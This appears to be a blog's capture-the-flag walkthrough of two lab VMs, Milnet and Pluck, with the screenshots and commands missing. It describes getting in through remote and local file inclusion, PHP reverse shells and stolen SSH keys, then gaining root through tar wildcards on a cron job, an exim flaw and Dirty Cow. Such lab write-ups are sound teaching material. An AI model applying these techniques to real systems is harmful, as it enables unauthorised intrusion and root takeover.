Wednesday, September 26, 2018



- Layout for this exercise:


- The goal of this exercise is to develop a hacking process for the vulnerable machine Milnet.

- Milnet can be downloaded from here:,148/

- Once downloaded and extracted with VMware:

- Milnet shows that its IP is


- Confirming that the IP is with netdiscover:

- Scanning with Nmap:

- Scanning deeply the HTTP server:

- nitko helps to enumerate the web server, for instance we learn about the existence of the page info.php:

- Connecting to the web application:

- From info.php we learn that the directives allow_url_fopen and allow_url_include are on, what could lead to a potential RFI (Remote File Inclusion) vulnerability:

- Testing Milnet with OWASP ZAP we confirm the existence of the RFI, actually at the page content.php and the parameter route.


- The next step will be to exploit Milnet taking advantage of the RFI vulnerability  at page content.php, for instance uploading and executing remotely a reverse shell exploit like the well known php-reverse-shell, provided by Kali:

- Adapting the exploit to our needs and renaming to myshell:

- Now, with the purpose of uploading and executing myshell remotely at Milnet, let's open a connection with Burp. 

- For instance, from the three available tabs of the navigation menu let's access with Main:

- Intercepting the connection with Burp we detect the presence of the route parameter:

- Opening a web server at port 8000, so that myshell can be uploaded from Kali to Milnet:

- Setting a Netcat listening session at port 4444:

- Now, let's change the route parameter to our PHP reverse shell, and then Forward with Burp:

- myshell is successfully uploaded and executed at Milnet:

- Le'ts notice that an extension .php is added by default by the web application, so that is the reason because we renamed the exploit to just myshell (without .php), otherwise we would be uploading something like myshel.php.php

- Anyway, the consequence is a successful limited remote shell:


- Exploring Milnet we find the folder longman:

- Going into SDINET there are a lot of text files related with Information Security:

 - Exploring crontab we find a backup script, run (with root privileges !!) every 1 minute:

- Reading we learn that /var/www/html is packed with tar and compressed with a .tgz format:

- However, let's notice that the tar command ends up with a suspicious wildcard *

- The command tar can used the wildcard * for differente purposes:

- It reminds us that one the Information Security text file present at /home/langman is actually titled with wildcard * related information:

- Actually the document is public:

- Reading this document we learn an interesting way to escalate privileges. Going to the tar section 4.3:

 - The document provides even an example:

- Now, let's try to replicate this example at our vulnerable machine Milnet.

- Going to /var/www/html:

- Creating these 3 files:

- The purpose of the script is to change or update the root password to abcd, using the command chpasswd:

- Now, these 3 files are part of the folder /var/www/html and all of them are going to be "tar" every 1 minute, according to the crontab task:

- Waiting for 1 minute until the cron task is run, we can successfully connect to Milnet via SSH using root:abcd as credentials:

- Finally we have achieved a remote root shell.

- An alternative script would be to assign sudoers privileges with no password to user www-data:

- Now we can get another remote root shell in this  way:


- Reading credits.txt:



- Layout for this exercise:


- The goal of this exercise is to develop a hacking process for the vulnerable machine Pluck.

- Pluck can be downloaded from here:,178/

- Once downloaded, extracted and imported with VirtualBox:


- Using netdiscover let's confirm that the IP is

- Scanning with nmap:

- Browsing the web server:

- nikto helps discovering a very promising LFI (Local File Inclusion) vulnerability at the web application:

- Let's check that LFI works, for instance reading /etc/passwd:

- From /etc/passwd we learn that there are users like bob, peter, paul, backup-user,  ..

- Also, reading the last line it seems that there is a script for performing backups::

- Taking advantage of the LFI to read the script

- The backup script informs us about three issues:

  • backups can be transferred with TFTP
  • the compressed backup file is located at /backups/backup.tar
  • both folders /home and /var/www/html are usually backup

- Obviously, our next goal must be to download backup.tar


3.1 - Local File Inclusion

- Trying to get backup.tar using the browser and taking advantage of the LFI is a little bit messy, due to the hugh size of the file:

- tftp does a better job:

- Also, curl would be a good alternative:

- Opening backup.tar:

- Now we have Pluck's backup folders available at our Kali machine:

- Searching for information inside bob and peter's home folders, there is nothing out of the ordinary:

- However we find a collection of 6 private and public keys inside paul's home folder:

- Checking what type of file are these keys, they are valid for SSH connections:

- Now,  we can use these keys with option -i identity_file to establish SSH conections:

- First attempt with id_key1 is unsuccessful:

- Same thing with id_key2 and id_key3:

- However, id_key4 leads to a Pdmenu:

- Pdmenu is a simple menu program that displays a menu from which the user can pick programs to run, for instance to edit files:

3.2 - Limited remote shell with PHP reverse shell

- Now, using the Pdmenu we are going to create remotely a file called myshell.php at /home/paul folder, just buy adapting the well-known PHP script php-reverse-shell.php to our needs:

- Editing remotely with Pdmenu the file /home/paul/myshell.php and copying into it the content of the local myshell.php:

- Let's notice that the text editor is vim, so we save the file with writing and quitting :wq! 

- Now, it is time to start the actual explotaition, first by setting a listening nc session, and second by running myshell.php with curl:

- The exploitation is successful and we get a limited remote shell:

3.3 - Limited remote shell with VIM and external commands

- As an alternative now we are going to use Pdmenu to insert the command /bin/bash in the Vim editor, following these directions:

- Just quitting Vim and Pdmenu comes back with a remote limited shell:


4.1 - Local Privilege Escalation with exim-4.84.7 exploit

- Finding the SUID files that exist on the system, we discover exim-4.84-7:

- Exim (current version 4.91) is an SMTP email message transfer agent (MTA) for use on Unix systems under GPL, similar in style to Smail 3

- Exim before 4.86.2, when installed setuid root, allows local users to gain privileges via the perl_startup argument:

- There is a Local Privilege Escalation exploit related to this vulnerability:

- Copying the script to a new file

- Transferring from Kali to Pluck, specifically to /tmp folder:

- The transfer is successful, but has no execution permissions:

- Giving execution permissions to

- Running the script finally we get a remote root shell:

4.2 - Local Privilege Escalation with Dirty Cow Kernel Exploit

- An alternative to method explained at 4.1 would be to use this exploit: 

- Downloading to Kali:

- Transferring to Pluck:

- Compiling:

- Running cowroot we get a remote root shell:

- Apparently cowroot  destabilizes the system, so we follow these directions to achieve a more stable shell:


- Reading flag.txt: